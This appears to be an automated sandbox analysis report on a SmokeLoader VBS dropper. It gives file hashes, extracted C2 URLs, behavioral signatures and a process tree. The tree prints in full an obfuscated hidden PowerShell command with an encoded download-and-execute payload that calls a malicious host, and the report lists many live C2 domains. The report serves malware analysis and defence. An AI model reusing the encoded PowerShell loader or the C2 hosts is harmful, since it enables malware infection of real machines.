Analysis
-
max time kernel
113s -
max time network
63s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
03-06-2023 18:40
Static task
static1
Behavioral task
behavioral1
Sample
375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936.vbs
Resource
win10-20230220-en
General
-
Target
375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936.vbs
-
Size
22KB
-
MD5
642917731c4f19a1b7a1fab2333a84d2
-
SHA1
742e8e1701b03a0638eec505e17ad453a612ac5e
-
SHA256
375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936
-
SHA512
e27262555ca391e255200f5da4421ebd991ed1ff6399e82ed5f0ef76ced2d6e508fa96d4d23c62901e4eb55c21f0e131713669f1a39351ea1e4836c9cea593dd
-
SSDEEP
384:Ym0ICzXSsFmDFFlhPAO0SBVNKemRJ0pIu+5B70VVa4EdPBS0d928DYGm3Mq:Y7UZL0ouNia4y7/sVL
Malware Config
Extracted
http://americanocoffea.ru
Extracted
smokeloader
2022
http://polinamailserverip.ru/
http://lamazone.site/
http://criticalosl.tech/
http://maximprofile.net/
http://zaliphone.com/
http://humanitarydp.ug/
http://zaikaopentra.com.ug/
http://zaikaopentra-com-ug.online/
http://infomalilopera.ru/
http://jskgdhjkdfhjdkjhd844.ru/
http://jkghdj2993jdjjdjd.ru/
http://kjhgdj99fuller.ru/
http://azartnyjboy.com/
http://zalamafiapopcultur.eu/
http://hopentools.site/
http://kismamabeforyougo.com/
http://kissmafiabeforyoudied.eu/
http://gondurasonline.ug/
http://nabufixservice.name/
http://filterfullproperty.ru/
http://alegoomaster.com/
http://freesitucionap.com/
http://droopily.eu/
http://prostotaknet.net/
http://zakolibal.online/
http://verycheap.store/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 2 4260 powershell.exe 4 4260 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
MhxDHvaX.exepid process 4856 MhxDHvaX.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
MhxDHvaX.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MhxDHvaX.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MhxDHvaX.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MhxDHvaX.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeMhxDHvaX.exepid process 4260 powershell.exe 4260 powershell.exe 4260 powershell.exe 4856 MhxDHvaX.exe 4856 MhxDHvaX.exe 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 3164 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3164 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
MhxDHvaX.exepid process 4856 MhxDHvaX.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4260 powershell.exe Token: SeShutdownPrivilege 3164 Token: SeCreatePagefilePrivilege 3164 -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
WScript.execmd.exepowershell.exedescription pid process target process PID 4024 wrote to memory of 3436 4024 WScript.exe cmd.exe PID 4024 wrote to memory of 3436 4024 WScript.exe cmd.exe PID 3436 wrote to memory of 4260 3436 cmd.exe powershell.exe PID 3436 wrote to memory of 4260 3436 cmd.exe powershell.exe PID 4260 wrote to memory of 4856 4260 powershell.exe MhxDHvaX.exe PID 4260 wrote to memory of 4856 4260 powershell.exe MhxDHvaX.exe PID 4260 wrote to memory of 4856 4260 powershell.exe MhxDHvaX.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\375798f97452cb9143ffb08922bebb13eb6bb0c27a101ebc568a3e5295361936.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYQBtAGUAcgBpAGMAYQBuAG8AYwBvAGYAZgBlAGEALgByAHUAIgApAA==2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYQBtAGUAcgBpAGMAYQBuAG8AYwBvAGYAZgBlAGEALgByAHUAIgApAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\MhxDHvaX.exe"C:\Users\Admin\AppData\Local\Temp\MhxDHvaX.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\MhxDHvaX.exeFilesize
274KB
MD51f95b8c2dc09a84f6a9fe6f74dbf7d96
SHA135f2c55596e43c2887d70a172d452fc5ac36835d
SHA2569892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330
SHA5127d7bf42a7df0ec4dcf0f8ac891bee60871ddc45c9887d8b5022dcddc27fae7afdd2134370f1a5ac898c364c5d702e9fb84b496d7c8a253fefd96d65715ba563c
-
C:\Users\Admin\AppData\Local\Temp\MhxDHvaX.exeFilesize
274KB
MD51f95b8c2dc09a84f6a9fe6f74dbf7d96
SHA135f2c55596e43c2887d70a172d452fc5ac36835d
SHA2569892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330
SHA5127d7bf42a7df0ec4dcf0f8ac891bee60871ddc45c9887d8b5022dcddc27fae7afdd2134370f1a5ac898c364c5d702e9fb84b496d7c8a253fefd96d65715ba563c
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tjal132m.zgk.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Roaming\vbujsjuFilesize
274KB
MD51f95b8c2dc09a84f6a9fe6f74dbf7d96
SHA135f2c55596e43c2887d70a172d452fc5ac36835d
SHA2569892c10b94bbb90688cdc3dd6d51f3343b9cc19069fa4c1fe3594600a3d03330
SHA5127d7bf42a7df0ec4dcf0f8ac891bee60871ddc45c9887d8b5022dcddc27fae7afdd2134370f1a5ac898c364c5d702e9fb84b496d7c8a253fefd96d65715ba563c
-
memory/3164-166-0x0000000001410000-0x0000000001426000-memory.dmpFilesize
88KB
-
memory/4260-125-0x00000168405F0000-0x0000016840612000-memory.dmpFilesize
136KB
-
memory/4260-128-0x0000016827EE0000-0x0000016827EF0000-memory.dmpFilesize
64KB
-
memory/4260-130-0x0000016827EE0000-0x0000016827EF0000-memory.dmpFilesize
64KB
-
memory/4260-132-0x00000168406A0000-0x0000016840716000-memory.dmpFilesize
472KB
-
memory/4260-147-0x0000016827EE0000-0x0000016827EF0000-memory.dmpFilesize
64KB
-
memory/4856-165-0x0000000000800000-0x0000000000809000-memory.dmpFilesize
36KB
-
memory/4856-167-0x0000000000400000-0x000000000068A000-memory.dmpFilesize
2.5MB